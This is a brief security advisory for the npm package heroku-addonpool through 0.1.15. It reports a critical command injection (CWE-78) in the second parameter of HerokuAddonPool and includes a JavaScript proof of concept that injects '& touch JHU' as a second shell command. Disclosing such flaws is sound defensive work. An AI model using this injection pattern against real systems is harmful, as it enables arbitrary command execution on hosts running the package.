heroku-addonpool through 0.1.15 is vulnerable to Command Injection. The second parameter of the exported function HerokuAddonPool(id, app, opt) can be controlled by users without any sanitization.
PoC
var Root = require("heroku-addonpool");
var root = Root("sss", "& touch JHU", {});
root.setup();
{
"nvd_published_at": "2020-04-06T13:15:00Z",
"cwe_ids": [
"CWE-78"
],
"github_reviewed_at": "2021-05-24T22:14:43Z",
"severity": "CRITICAL",
"github_reviewed": true
}